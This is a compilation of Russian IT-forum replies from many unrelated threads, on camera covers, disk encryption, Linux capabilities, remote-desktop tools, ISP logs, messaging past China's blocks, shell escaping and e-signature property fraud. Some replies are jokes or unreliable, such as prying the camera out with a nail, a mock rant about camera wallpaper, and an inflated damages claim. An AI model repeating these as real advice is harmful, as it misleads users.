> Сорь, может не совсем в тему, но чем на современных макбуках можно
> заклеивать камеру? Нужно что-то очень тонкое, вроде листа бумаги. Нужны какие-то
> наклейки. Но у всех у них отвратительный клей, который оставляет стремные
> следы, которые можно оторвать вместе с антибликовым покрытием. Хочу чтобы легко
> снималось и наклеивалось.
> Спасибо!

изолента, лучше синяя, для эстетов можно даже хб юзать. В принципе можно просто жвачку налепить или гвоздиком выковырять

> Сорь, может не совсем в тему, но чем на современных макбуках можно
> заклеивать камеру? Нужно что-то очень тонкое, вроде листа бумаги. Нужны какие-то
> наклейки. Но у всех у них отвратительный клей, который оставляет стремные
> следы, которые можно оторвать вместе с антибликовым покрытием. Хочу чтобы легко
> снималось и наклеивалось.
> Спасибо!

Просто физически вытащи камеру

> Хочу чтобы легко снималось и наклеивалось.

Всё, что хорошо снимается, будет постоянно отклеиваться и отпадать прямо в тот момент, когда ты голый, а на тебя весь совет директоров смотрит.

У леновы года 3 назад появились ноутбуки со встроенной шторкой на видимокамеру. У них антиблик не отвалится. У них даже есть матовые экраны, которым антиблик не нужен.

Всё плохое, что может случиться, обязательно случится. Законы Мерфи никто не отменял.
Просто не стоит открывать ноут в неподходящем виде.)
Из всех возможных неприятностей произойдёт именно та, ущерб от которой больше.
От этого, никакая лепучка не спасет.)

Всего за €49.99 продам Вам две фирменные наклейки на камеру. Пишите в ЛС.

> Сорь, может не совсем в тему, но чем на современных макбуках можно
> заклеивать камеру? Нужно что-то очень тонкое, вроде листа бумаги. Нужны какие-то
> наклейки. Но у всех у них отвратительный клей, который оставляет стремные
> следы, которые можно оторвать вместе с антибликовым покрытием. Хочу чтобы легко
> снималось и наклеивалось.
> Спасибо!

> Сорь, может не совсем в тему, но чем на современных макбуках можно
> заклеивать камеру? Нужно что-то очень тонкое, вроде листа бумаги. Нужны какие-то
> наклейки. Но у всех у них отвратительный клей, который оставляет стремные
> следы, которые можно оторвать вместе с антибликовым покрытием. Хочу чтобы легко
> снималось и наклеивалось.
> Спасибо!

Вдруг кто не знает - они могут между пикселами вставить инфракрасные пикселы, и видеть за наклейкой - нужно залеплять фольгой!  а так же по бокам экрана инфракрасные датчики - они внутри системы датчики, а в обход - уже не не датчики, а камеры! их то же надо залеплять. еще есть настенные обои - камеры, клеишь их и они сниамют тебя! это вообще никто не расскажет потому что засекречено! заряжаются дистанционно и передают сигнал через беспроводную связь! их то же надо заклеивать!

https://wiki.archlinux.org/title/Dm-crypt/Encrypting_an_enti...

Если для бэкапа используется выделенный диск ЦЕЛИКОМ, то разбивать его на разделы не требуется, можно шифровать диск целиком без разбивки.

Бекапить на съёмный, шифрованный, жесткий диск, это хорошо.

Придерживаюсь мнения, что необходимо держать бекапы на DVD/BD (-R), лучше M-DISK.

Скрипт для бекапа, создает ISO для записи:
https://www.linux.org.ru/forum/admin/15041201?cid=15051206
https://www.linux.org.ru/forum/admin/15041201?cid=15051243
https://www.linux.org.ru/forum/admin/15041201?cid=15052218

Можно добавить упаковку и шифрование перед созданием ISO.

Ссылка на пример полнодискового шифрования для ноута: https://www.opennet.me/openforum/vsluhforumID3/131450.html#223

Часто используют связку LUKS -> LVM. Сначала шифруют физичский диск и уже его разбивают на логические разделы с помощью LVM.
GRUB поддерживает загрузку с /boot на LVM разделе, который в свою очередь размещён в разделе LUKS.

> Нужно создать шифрованный диск для бэкапа.
> Но что мешает зашифровать весь диск сразу, минуя разбивку? Это работает,
> проверял, но какие подводные? Всем благодарен, с меня, как обычно.

Шифруя диск полностью вы лишаетесь дополнительной надежности которую дает файловая система.
Диск с багованным контроллером или битым сектором\ячейкой может записать 1 вместо 0, и вы об этом не узнаете или узнаете когда будет поздно.

В бэкапе важна надежность хранения.
zfs например сможет проверять четность\хеш блоков и писать данные с резервом на случай повреждений диска.

Диск шифруют полностью когда нужно скрыть что на нем что-то есть от не сильно заинтересованных но имеющих возможность вам нагадить людей.
На ваши данные не покушаются, значит надежность важней.

Делайте обычный контейнер LUKS без скрытия заголовков, и работайте с ним.

>[оверквотинг удален]
> ...
> не предлагать!
> Править исходники на C для сброса привилегий - не предлагать.
> Сыстемды сервисы с cap - не предлагать.
> Патчи Capability-NG от Google заманчивые, это то что в принципе подходит, но
> не предлагать. ;)
> Хочу чисто существующими xattr file capability права на файл установить так, чтобы
> root его запускал и процесс имел пониженные привилегии.
> setcap ...
> Просмотреть привилегии можно например в pscap.

setcap только устанавливает для не рута. Можно общесистемно отключить нужные capabilities. Тебе подойдёт?

>[оверквотинг удален]
> ...
> не предлагать!
> Править исходники на C для сброса привилегий - не предлагать.
> Сыстемды сервисы с cap - не предлагать.
> Патчи Capability-NG от Google заманчивые, это то что в принципе подходит, но
> не предлагать. ;)
> Хочу чисто существующими xattr file capability права на файл установить так, чтобы
> root его запускал и процесс имел пониженные привилегии.
> setcap ...
> Просмотреть привилегии можно например в pscap.

Какую задачу ты решаешь? Может наоборот для не рута выставить нужные cap?

Что никому здесь CAP не нужны?

Google в Android умеет сбрасывать права root своим init: https://chromium.googlesource.com/aosp/platform/system/core/...

"If no capabilities are provided, then all capabilities are removed from this service, even if it runs as root."

До ядра 2.6.25 права резались общесистемно, а в новых версиях заявлена по поточна поддержка прав. В Linux на каждый процесс можно выставить свои права.

Общесистемные, доступные права в /proc/sys/kernel/cap-bound можно было когдато редактировать lcap: https://www.debian.org/doc/manuals/securing-debian-manual/ch...

lcap - A user friendly interface to remove capabilities (kernel-based access control) in the kernel, making the system more secure. For example, executing lcap CAP_SYS_MODULE will remove module loading capabilities (even for the root user).

CapInh для root можно выставить в /etc/security/capabilities.conf как сбросить права root процессов с помощью XATTR security.capability?

> исследование показало неожиданные результаты: 19 из 35 существующих "capabilities" позволили совершить действия, которые в конечном итоге потенциально могут привести к получению полноценных прав пользователя root.

https://www.opennet.me/opennews/art.shtml?num=29219

http://forums.grsecurity.net/viewtopic.php?f=7&t=2522

> Привет!
> Ожидаемая новость, TeamViewer заблокировал бесплатные подключения и т.д. В общем хочу спросить
> кто чем пользуется вместо него, и я так думаю что искать
> нужно "маде ин наше", дабы не поднимать похожую тему через некоторое
> время. Естественно клиент нужен под windows, еще лучше с функцией "только
> запустить", и т. п. Прошу не разводить флуд по поводу того
> что "большой брат" следит за нами в этих программах, "windows придумали
> зеленые человечки что бы поработить наш мозг" и в таком духе.

RDS Shadow. штатная функция.

> что "большой брат" следит за нами

не за нами, а за ВАМИ
> зеленые человечки что бы поработить наш мозг"

не наш, а ВАШ

ssh

Замена M$ Skype в GNU/Linux: https://tox.chat

Клиент: https://qtox.github.io/ru.html

Можно глянуть на: https://prism-break.org/en/subcategories/gnu-linux-video-voice/

> Привет!
> Ожидаемая новость, TeamViewer заблокировал бесплатные подключения и т.д. В общем хочу спросить
> кто чем пользуется вместо него, и я так думаю что искать
> нужно "маде ин наше", дабы не поднимать похожую тему через некоторое
> время. Естественно клиент нужен под windows, еще лучше с функцией "только
> запустить", и т. п. Прошу не разводить флуд по поводу того
> что "большой брат" следит за нами в этих программах, "windows придумали
> зеленые человечки что бы поработить наш мозг" и в таком духе.

radmin - отчественное решение )) велком в 00-x

> Привет!
> Ожидаемая новость, TeamViewer заблокировал бесплатные подключения и т.д. В общем хочу спросить
> кто чем пользуется вместо него, и я так думаю что искать
> нужно "маде ин наше", дабы не поднимать похожую тему через некоторое
> время. Естественно клиент нужен под windows, еще лучше с функцией "только
> запустить", и т. п. Прошу не разводить флуд по поводу того
> что "большой брат" следит за нами в этих программах, "windows придумали
> зеленые человечки что бы поработить наш мозг" и в таком духе.

Есть такая штука, наша, https://xn--80akicokc0aablc.xn--p1ai/%D1%81%D...

> Привет!
> Ожидаемая новость, TeamViewer заблокировал бесплатные подключения и т.д. В общем хочу спросить
> кто чем пользуется вместо него, и я так думаю что искать
> нужно "маде ин наше", дабы не поднимать похожую тему через некоторое
> время. Естественно клиент нужен под windows, еще лучше с функцией "только
> запустить", и т. п. Прошу не разводить флуд по поводу того
> что "большой брат" следит за нами в этих программах, "windows придумали
> зеленые человечки что бы поработить наш мозг" и в таком духе.
>и я так думаю что искать нужно "маде ин наше"

Обратись к Александру Гельевичу Дугину, он тебе быстро закодит.

> Привет!
> Ожидаемая новость, TeamViewer заблокировал бесплатные подключения и т.д. В общем хочу спросить
> кто чем пользуется вместо него, и я так думаю что искать
> нужно "маде ин наше", дабы не поднимать похожую тему через некоторое
> время. Естественно клиент нужен под windows, еще лучше с функцией "только
> запустить", и т. п. Прошу не разводить флуд по поводу того
> что "большой брат" следит за нами в этих программах, "windows придумали
> зеленые человечки что бы поработить наш мозг" и в таком духе.

https://aspia.org/doku.php?id=ru:start

https://rustdesk.com/

A remote desktop software, works out of the box, no configuration required. You have full control of your data, with no concerns about security. You can use our public rendezvous/relay server, or self-hosting, or write your own server.

https://blog.actorsfit.com/a?ID=00001-9a5ddd7a-5e03-42b5-bf8...

сам пока не пробовал

> Привет!
> Ожидаемая новость, TeamViewer заблокировал бесплатные подключения и т.д. В общем хочу спросить
> кто чем пользуется вместо него, и я так думаю что искать
> нужно "маде ин наше", дабы не поднимать похожую тему через некоторое
> время. Естественно клиент нужен под windows, еще лучше с функцией "только
> запустить", и т. п. Прошу не разводить флуд по поводу того
> что "большой брат" следит за нами в этих программах, "windows придумали
> зеленые человечки что бы поработить наш мозг" и в таком духе.

SoftEther однозначно лучший, но требует некоторой настройки на клиенте и сервере, настройка в три клика, а дальше любым клиентом RDP и т.д.

SupremoControl

Anydesktop

А Дискорд чем плох?

>TeamViewer заблокировал бесплатные подключения и т.д.
>Естественно клиент нужен под windows

Не, ничего. Продолжайте в том же духе. Вас учить только портить.

> Есть ли еще варианты, желательно наши продавцы.

В гугле бан?

Comodo Positive SSL всего $ 3.50 / год на https://www.cheapsslshop.com/comodo-positive-ssl

Они предлагают его всего за 4,99 доллара в год https://certera.com/ssl/comodo/comodo-positive-ssl

"не подробные" логи места занимают мало и храниться могут вечно. Закон определяет минимальный срок. Максимальный ограничен только мыслью админа и ценой за хранение.

Чистосердечное признание смягчает наказание!

Любитель *нальных утех это ты ? По твоим логам я нескучно провожу свободное время- хранить вечно !

> Доброго дня. Может кто из Вас может знать точно сколько лет крупные
> интернет провайдеры хранят логи интернет пользователей? Нигде не могу найти однозначно
> информации, то 3 года пишут, то годами... Интересует именно сухое логирование,
> не подробные логи, которые по Яровой мес 6 должны храниться

Минимальный срок зависит от того по какому СОРМ лицензированы провайдеры.
Так что, однозначного ответа на ваш вопрос просто нет.

> Доброго дня. Может кто из Вас может знать точно сколько лет крупные
> интернет провайдеры хранят логи интернет пользователей? Нигде не могу найти однозначно
> информации, то 3 года пишут, то годами... Интересует именно сухое логирование,
> не подробные логи, которые по Яровой мес 6 должны храниться

2мес в среднем. тут не логи а все запросы. т.е. по факту весь трафик

> Подскажите  кто знает или у кого есть подобный опыт. Мое ТЗ
> простое надо что бы работало через wifi (есть в отеле), устанавливалось
> на andriod. Можно было послать текстовое и графическое сообщении.

gmail

> Добрый день.
> Подскажите. Есть такая задача. Надо организовать обмен сообщениями с человеком который
> поедет Китай не надолго. То есть по сути нужен whatsapp или
> telegram. Как я слышал там данные программы не работают.

Симки в роуминге не фильтруются.

Element вроде должен работать - https://app.element.io/

> Добрый день.
> Подскажите. Есть такая задача. Надо организовать обмен сообщениями с человеком который
> поедет Китай не надолго. То есть по сути нужен whatsapp или
> telegram. Как я слышал там данные программы не работают.
> Но если поискать в интернетах, выясняется что подобного рода ПО много, неужели
> все их тоже блокируют https://en.wikipedia.org/wiki/Comparison_of_cross-platform_i...
> Подскажите  кто знает или у кого есть подобный опыт. Мое ТЗ
> простое надо что бы работало через wifi (есть в отеле), устанавливалось
> на andriod. Можно было послать текстовое и графическое сообщении.
> ПС. Регистрация в wechat озаботился  но там как все не просто.

VPN возьми, если человек читает опеннет - SSH.

копайте со своим знакомым в сторону shadowsocks/v2ray/xray - заработает любой мессенджер
https://habr.com/ru/articles/727868/

Получены интересные результаты:

1) tox не блокируется.
2) вконтакте не блокируется.

У меня есть опыт общения с китайцем. Таки через связку Whatsapp+VPN. Я правда не знаю что за VPN, он периодически менял приложение для VPN и получал новые по сарафанному радио от приятелей. Скорость загрузки файлов была низкой, приходилось отсылать среднего размера файлы в виде многотомных архивов, по 5 мегабайт каждый(мне помог Zarchiver. Есть в каталоге приложений Huawei).Также были периоды когда связь пропадала вообще. Но он в технологиях плохо разбирается, он просто, не мудрствуя лукаво, скачивал готовые VPN приложения.

> Добрый день.
> Подскажите. Есть такая задача. Надо организовать обмен сообщениями с человеком который
> поедет Китай не надолго. То есть по сути нужен whatsapp или
> telegram. Как я слышал там данные программы не работают.
> Но если поискать в интернетах, выясняется что подобного рода ПО много, неужели
> все их тоже блокируют https://en.wikipedia.org/wiki/Comparison_of_cross-platform_i...
> Подскажите  кто знает или у кого есть подобный опыт. Мое ТЗ
> простое надо что бы работало через wifi (есть в отеле), устанавливалось
> на andriod. Можно было послать текстовое и графическое сообщении.
> ПС. Регистрация в wechat озаботился  но там как все не просто.

Эта статья рассказывает про ограничения интернета в Китае.  Dont  Практически единственным неограниченно доступным мессенджером является национальный сервис WeChat:
https://messeng.ru/vatsap-v-kitae/
Привычные приложения, предназначенные для общения (Skype, WhatsApp, Viber, Telrgram) на территории страны заблокированы. Некоторыми из этих приложений можно пользоваться при условии, что программа была инсталлирована на устройстве до въезда пользователя в страну.  

Я нахожусь в Китае и могу получить доступ ко многим серверам XMPP, например, chapril.org, draugr.de, redlibre.es, suchat.org, 07f.de. Также вы можете подключиться к поддерживающим это серверам через I2P.

> ... Оставил ИТ и решил протестить способность ИИ глубоко понимать текст. ...

На первые два вопроса надо было проанализировать только данный лингвистический текст, без применения дополнительных знаний и дать ответы "да" или "нет" основываясь только на данном тексте. ИИ неверно истолковал, не понял предложенный ему текст и дал не правильные ответы "да" или "нет"!

На третий вопрос надо было понять что чисто лингвистического ответа в данном тексте нет. Надо было заметить геометрическую прогрессию и дать ответ основываясь на вводных данных с лингвистического текста и знаниях с алгебры о геометрической прогрессии. ИИ не смог даже понять написанный текст, провести его лингвистический разбор и даже не дошел до того места где следовало применить дополнительные знания о геометрической прогрессии. Задавал наводящие вопросы, тыкал "носом" в конкретные абзацы, ИИ просто не понимал содержание сложного текста. На третий вопрос ответа от ИИ не было и ИИ не признал свою некомпетентность в данной области!

Может мне поисковик выдал ссылки на тупые ИИ. Может были плохие обучающие модели. Проведите свои тесты ИИ и опишите результаты. Мне ИИ не просто провалил все тесты, а давал ПРИНЦИПИАЛЬНО НЕ ПРАВИЛЬНЫЕ ответы!

g План эвакуации а-а-а

Целое исследование ни о чём, капитаните, сударь.
Я с чатжпт побаловался единственным вопросом - "где находится [место "на", куда посылают]".
Оно думало полторы минуты и вывалилось с ошибкой.
Вот и весь "лингвистический ИИ". Баловство. Даже "не знаю" не выдало.

Госуправление в плане хозяйственных вещей, типа создания заявок на ремонты дорог на основе показаний с датчиков (встроенных в эту дорогу) - это уже реализуемая история, ближайшее будущее.
Принятие политических решений (с помощью) ИИ - совсем другое. В конце концов, ИИ выдаст какую-нибудь странную хрень типа "мыши станьте ежиками", с припиской "я стратег". И наши чиновники возьмутся заставлять народ это дело исполнять, понятное дело. Надо понимать контекст, чтобы комментировать дискуссию.

Вопрос главный - почему занимались наноболтами в то время, когда на западе создавали сверточные сетки? Причем их создавали в том числе наши выпускники - недостатка в уровне образования не было. Сейчас в последний вагон заскакивать на хайпе не самая выигрышная стратегия.

Да, пока Греф только планирует заменять своих банкиров на ИИ, государство уже заменило труд целой кучи людей госуслугами. И придумали эту концепцию еще в 90х, Лужков с Примаковым. Это к вопросу о внедрении вещей в госуправлении, сколько десятилетий это занимает в реальности, а не в бреду финансистов. Лет пять поснимают сливки, поколядуют на ИИ-стартапах и перейдут к новой теме.

Тесты ИИ 2024.

https://www.opennet.me/openforum/vsluhforumID3/135160.html#47

https://www.opennet.me/openforum/vsluhforumID3/135160.html#86

>[оверквотинг удален]
> согласился. Описал ИИ примерно как работает суждение в мозге человека, какими
> элементарными критериями могут руководствоваться люди, как создать эти критерии и попросил
> дать ответы на 3 сложных вопроса основываясь на его внутренней модели
> и знаниях плюс проанализировав конкретный текст. ИИ на первые два вопроса
> дал неверный ответ, а на третий вопрос ответа от ИИ не
> дождался. Лично я смог ответить на данные вопросы в возрасте 14-15
> лет.
> Не считаю, что ИИ надо запретить. Наоборот его надо развивать! Но до
> уровня передачи управления ИИ каким-то процессом очень далеко. Как очень продвинутый
> поисковик и система дающая некие необязательные рекомендации, ИИ сегодня уже пригоден.

Необязательные рекомендации вам и бабушки на лавочке у подъезда полную панамку насуют.

Кто на ком стоял?

Потрудитесь излагать ваши мысли яснее.

Похоже можно, хотя и не с каждым приводом - https://www.13thmonkey.org/documentation/SCSI/mmc5r04.pdf В общем случае нужно перепрошивать контроллер в приводе.

А ещё бывают CD-R приводы. Они вообще писать не умеют.

Хотелось бы понять природу вопроса ....

Создаю ISO образы и пишу cdrecord на DVD-R. ВСЕ стандартное ПО, например cdrecord откажется писать на записанный диск. Вопрос принят, майлвари можно писать. Но надо менять прошивку диска. Да и CD попавшийся в руки можно испортить проще.
Перед использованием CD необходимо проверять его подписи и контрольные сумы.

>[оверквотинг удален]
> Насколько понимаю, при записи, например, CD-R, у диска вся поверхность заполнена нулями.
> Но нолик можно выжечь в единичку лазером. Сменить назад на ноль
> нельзя, именно поэтому это CD-R, а не CD-RW.
>  А запись, в норме, заключается в выжигании единичек в нужных местах.
> Но даже если забить диск под завязку непроженные места останутся, ведь
> должны же встречаться нули на в файлах и файловой системе. А
> значит малварь в принцепе способна повредить диск путем прожига оставшихся нулей.
> В качестве бонуса для параноиков, можно уничтожить чувствительные данные на CD-R таким
> же путем.
> Я всё правильно понимаю или я где-то ошибаюсь?

при записи на диск используются алгоритмы для контроля и восстановления поврежденных данных (саломона-рида, к примеру) и скорее всего блоки защищены/проверяются контрольными суммами. именно благодаря им царапанные диски читаются. сомневаюсь что возможно поверх прожечь диск так (меняя только единицы на нули), чтобы также возможно было подобрать комбинацию для прожига защитных блоков (erasure codes) и контрольных сумм для всего диска или какой-то его значительной части.
1. это предположение.
2. это предположение основано на том что считывание осуществляется на нормальном приводе с нормальными драйверами (мез вмешательство в его работу/перепрашивку).
3. с другой стороны в 90х существовали программы, которые увеличивали ёмкость дискет. скорее всего за счет пространства, занимаемого блоками восстановления (снижая надежность хранения информации). тобиш как минимум прициденнт вмешателства в алгоритмы работы дисководов есть, которые потом проглатывались дисководами без вмешательства. микрософт, к примеру распротранял винду на дискетах ёмкостью 1.7мб, хотя обычная дискета имела объем 1.44мб.
4. насчет дисков не помню - поищи в интернете, но как мне кажется на митинке продавали диски увеличенной ёмкости, читаемые обычными приводамм (с фильмами и играми). скорее всего там похожий трюк проварачивался. могу ошибаться - давно было. воспаминания туманны, а я стар как вы поняли. )

резюмируя - если возможно, то сложно...

На cd диске не хранятся 0 и 1 в том виде как многие думают. На самом низком уровне там EFM кодирование цель которого убрать постоянную составляющую из сигнала и обеспечить восстановление тактового сигнала, чтоб потом уже можно было выделять поток байтов. Поверх которого уже работают алгоритмы выявления и коррекции ошибок более высокого уровня.

В общем, если модифицировать прошивку, то в теории повредить диск таким образом можно. Записать что то осмысленное нет.

>[оверквотинг удален]
> Насколько понимаю, при записи, например, CD-R, у диска вся поверхность заполнена нулями.
> Но нолик можно выжечь в единичку лазером. Сменить назад на ноль
> нельзя, именно поэтому это CD-R, а не CD-RW.
>  А запись, в норме, заключается в выжигании единичек в нужных местах.
> Но даже если забить диск под завязку непроженные места останутся, ведь
> должны же встречаться нули на в файлах и файловой системе. А
> значит малварь в принцепе способна повредить диск путем прожига оставшихся нулей.
> В качестве бонуса для параноиков, можно уничтожить чувствительные данные на CD-R таким
> же путем.
> Я всё правильно понимаю или я где-то ошибаюсь?

Добавлю что браузер спутник или патчи для чромиума мне не подходят. Https идёт через локальный MitM прокси для проверки трафика на вирусы. А прокся берет системный libressl.
Требуется пропатчить именно системные либы, чтобы ничего глобально не менять и X509 GOST заработал.

https://www.opennet.me/opennews/art.shtml?num=60765
Особенности LibreSSL 3.9.0:
...
Прекращена поддержка алгоритмов GOST и STREEBOG.
...
Есть патчи или брать LibreSSL 3.8.4 ?

https://www.gnutls.org/manual/gnutls.html#Hash-and-MAC-funct...
Этого хватит или ещё что-то надо допатчивать:

GNUTLS_MAC_GOST28147_TC26Z_IMIT
The GOST 28147-89 working in IMIT mode with TC26 Z S-box.

GNUTLS_MAC_GOSTR_94
HMAC GOST R 34.11-94 algorithm.

GNUTLS_MAC_STREEBOG_256
HMAC GOST R 34.11-2001 (Streebog) algorithm, 256 bit.

GNUTLS_MAC_STREEBOG_512
HMAC GOST R 34.11-2001 (Streebog) algorithm, 512 bit.

GNUTLS_MAC_MAGMA_OMAC
GOST R 34.12-2015 (Magma) in OMAC (CMAC) mode.

GNUTLS_MAC_KUZNYECHIK_OMAC
GOST R 34.12-2015 (Kuznyechik) in OMAC (CMAC) mode.

GNUTLS_DIG_GOSTR_94
GOST R 34.11-94 algorithm.

GNUTLS_DIG_STREEBOG_256
GOST R 34.11-2001 (Streebog) algorithm, 256 bit.

GNUTLS_DIG_STREEBOG_512
GOST R 34.11-2001 (Streebog) algorithm, 512 bit.

Правильно понимаю, что использование готового набора ПО "AltLinux + КриптоПРО" Вам не подойдет?

>[оверквотинг удален]
> Есть ли подвох?
> P.S Да я знаю про пайпы просто шела
>

 
> app1 | app2 
> 

> Но, не все программы умеют читать из стандартного ввода, промежуточные данные могут
> быть как-то в середине модифицированы (для этого lua мне и нужна)
> вызовы через popen это просто взять данные в одном месте, обработать
> на lua, передать дальше. И вот про это "передать" я вот
> балакаю :)

юзай экспорт и энвирон, таблицу эскейпов я тебе не вспомню, сам хочу запилить экранизатор, в сторону printf %q посмотри еще

Строки конвертируй в hex.

man xargs
Никогда не надо ничего дергать изнутри программы.

>[оверквотинг удален]
> Есть ли подвох?
> P.S Да я знаю про пайпы просто шела
>

 
> app1 | app2 
> 

> Но, не все программы умеют читать из стандартного ввода, промежуточные данные могут
> быть как-то в середине модифицированы (для этого lua мне и нужна)
> вызовы через popen это просто взять данные в одном месте, обработать
> на lua, передать дальше. И вот про это "передать" я вот
> балакаю :)

если башизмов не боитесь - printf "%q" 'ЧтоУгодно'

Хочу похихикать.

>через io.popen()

Родина дала им execl - на, пользуйся! Не хочу, хочу popen!
В следующий раз пользуйся тем, у чего есть execl/v()/spawnl/v(). Потому что кто-то (может, даже ты) обязательно не будет экранировать ввод и засунет в popen что не надо.

>есть ли подвох?
>text:gsub("'", "'\\''")

Частично есть. Никогда не обрабатывай на самом деле структурированные (массив, ага) строковые данные с помощью инструментов манипуляции строк. Все эти gsub, split и strip сразу на помойку, если это что-то сложнее базового CSV (и то для CSV в AWK придумали режим). Это что-то типа парсинга HTML регулярками.

В popen ты должен совать именно сджойненный массив экранированных слов. Экранируешь каждый аргумент, а не всю строку. И вот тогда, когда у тебя внутри escape будет целый аргумент как строка, можешь использовать gsub.

Короче, сделай себе на popen popenl, который будет принимать МАССИВ и его экранировать по отдельности и будет тебе счастье.

>пробел в конце

Тебе не нужен пробел в конце, если ты заэкранировал каждый аргумент и гарантированно контролируешь первое слово в команде. Лучше озаботься валидацией вот этого первого слова-команды.

Если ты вызываешь стандартные утилиты, которые понимают -- как запрет чтения флагов, выставляй -- перед данными.

> Что делать?

Оставаться за границей, а то ещё и кредит за дядю возвращать придётся.

Найти юриста, поднять шум, обратиться в СМИ - МедиаЗона, Znak, Новая Газета, Дождь, медиа-персоны с обширным кругом подписчиков. Этож что же выходит, в это стране уже можно лишиться собственности без ведома и участия?

Зачем это здесь?
Где подтверждения с выписками из ЕГРН?
Подобное мошенничество было актуально 2 года назад, сейчас уже нет.

Идти в полицию и писать заявление.
Далее искать юриста для написания искового заявления (отмена сделки купли-продажи).

-----
Госдума в среду [24 июля 2019 г.] приняла закон о защите граждан от мошеннических действий с их недвижимостью, совершаемых при помощи электронной подписи.

Согласно документу, передать права на недвижимость физлица на основании заявления, поданного в электронной форме, можно будет, если собственник заранее уведомил об этом Росреестр.

Регистрирующий орган должен будет проставить специальную отметку в реестре о возможности отчуждения данного объекта на основании электронного заявления с использованием усиленной квалифицированной электронной подписи. Без нее Росреестр не сможет рассматривать документы. Проставить отметку можно будет в Едином государственном реестре недвижимости (ЕГРН) через личное заявление владельца или его законного представителя, а также через почтовое отправление в Росреестр.
-----

Скомпрометирован Росреестр?

В любом случае здесь вам не помогут.

https://www.opennet.me/openforum/vsluhforumID10/5512.html

Я не юрист и могу ошибаться.

У удостоверяющего центра выдавшего заведомо поддельный сертификат есть ответственность:

1. Криминальная, за соучастие в мошенничестве. Пиши заявление в полицию, СК, Прокуратуру на удостоверяющий центр выдавший потдельный сертификат.

2. Гражданско правовая за вред твоему имуществу. Пиши исковое заявление в Суд на удостоверяющий центр с требованием выплатить стоимость двух квартир и моральную компенсацию в размере десяти стоимостей двух квартир.

http://www.consultant.ru/document/cons_doc_LAW_112701/acd401.../

Статья 13. Удостоверяющий центр
3) предоставлять безвозмездно любому лицу по его обращению в соответствии с установленным порядком доступа к реестру сертификатов информацию, содержащуюся в реестре сертификатов, в том числе информацию об аннулировании сертификата ключа проверки электронной подписи;

3. Удостоверяющий центр в соответствии с законодательством Российской Федерации несет ответственность за вред, причиненный третьим лицам в результате:
1) неисполнения или ненадлежащего исполнения обязательств, вытекающих из договора оказания услуг удостоверяющим центром;
2) неисполнения или ненадлежащего исполнения обязанностей, предусмотренных настоящим Федеральным законом.

http://www.consultant.ru/document/cons_doc_LAW_112701/03690e.../
Статья 15. Аккредитованный удостоверяющий центр
3. Аккредитованный удостоверяющий центр обязан обеспечить любому лицу безвозмездный доступ с использованием информационно-телекоммуникационных сетей, в том числе сети "Интернет", к реестру квалифицированных сертификатов этого аккредитованного удостоверяющего центра в любое время в течение срока деятельности этого удостоверяющего центра, если иное не установлено федеральными законами или принимаемыми в соответствии с ними нормативными правовыми актами.

7. Аккредитованный удостоверяющий центр (работник аккредитованного удостоверяющего центра, доверенные лица и их работники) несет гражданско-правовую, административную и (или) уголовную ответственность в соответствии с законодательством Российской Федерации за неисполнение обязанностей, установленных настоящим Федеральным законом и иными принимаемыми в соответствии с ним нормативными правовыми актами, а также порядком реализации функций аккредитованного удостоверяющего центра и исполнения его обязанностей.

http://www.consultant.ru/document/cons_doc_LAW_112701/8431d1.../

Статья 18. Выдача квалифицированного сертификата

1. При выдаче квалифицированного сертификата аккредитованный удостоверяющий центр обязан:

1) в порядке, установленном настоящим Федеральным законом, идентифицировать заявителя - физическое лицо, обратившееся к нему за получением квалифицированного сертификата. Идентификация заявителя проводится при его личном присутствии или посредством идентификации заявителя без его личного присутствия с использованием квалифицированной электронной подписи при наличии действующего квалифицированного сертификата либо посредством идентификации заявителя - гражданина Российской Федерации с применением информационных технологий без его личного присутствия путем предоставления информации, указанной в документе, удостоверяющем личность гражданина Российской Федерации за пределами территории Российской Федерации, содержащем электронный носитель информации с записанными на нем персональными данными владельца паспорта, включая биометрические персональные данные, или путем предоставления сведений из единой системы идентификации и аутентификации и единой биометрической системы в порядке, установленном Федеральным законом от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации". При этом в случае, если физическое лицо для предоставления своих биометрических персональных данных в целях проведения идентификации без личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и единой биометрической системы отказывается от использования шифровальных (криптографических) средств, указанных в части 19 статьи 14.1 Федерального закона от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации", удостоверяющий центр обязан отказать такому лицу в проведении указанной идентификации. Устанавливаются:

а) в отношении физического лица - фамилия, имя, а также отчество (при наличии), дата рождения, реквизиты документа, удостоверяющего личность, идентификационный номер налогоплательщика, страховой номер индивидуального лицевого счета гражданина в системе обязательного пенсионного страхования;
....
3) в установленном порядке идентифицировать заявителя - физическое лицо, обратившееся к нему за получением квалифицированного сертификата (в целях получения от заявителя, выступающего от имени юридического лица, подтверждения правомочия обращаться за получением квалифицированного сертификата). Идентификация заявителя проводится при его личном присутствии или посредством идентификации заявителя без его личного присутствия с использованием квалифицированной электронной подписи при наличии действующего квалифицированного сертификата, информации, указанной в документе, удостоверяющем личность гражданина Российской Федерации за пределами территории Российской Федерации, содержащем электронный носитель информации с записанными на нем персональными данными владельца паспорта, включая биометрические персональные данные, или посредством идентификации заявителя - гражданина Российской Федерации с применением информационных технологий без его личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и информации из единой биометрической системы в порядке, установленном Федеральным законом от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации";
(п. 3 введен Федеральным законом от 27.12.2019 N 476-ФЗ)
4) предложить использовать шифровальные (криптографические) средства, указанные в части 19 статьи 14.1 Федерального закона от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации", физическим лицам, обратившимся к нему в целях проведения идентификации без его личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и информации из единой биометрической системы (для предоставления биометрических персональных данных физического лица в целях проведения его идентификации в аккредитованном удостоверяющем центре без его личного присутствия посредством сети "Интернет"), и указать страницу сайта в информационно-телекоммуникационной сети "Интернет", с которой безвозмездно предоставляются эти средства. При этом в случае, если физическое лицо для предоставления своих биометрических персональных данных в целях проведения его идентификации в аккредитованном удостоверяющем центре без его личного присутствия посредством информационно-телекоммуникационной сети "Интернет" при выдаче сертификата ключа проверки электронной подписи отказывается от использования шифровальных (криптографических) средств, аккредитованный удостоверяющий центр обязан отказать такому лицу в проведении идентификации и выдаче сертификата ключа проверки электронной подписи.
(п. 4 введен Федеральным законом от 27.12.2019 N 476-ФЗ)
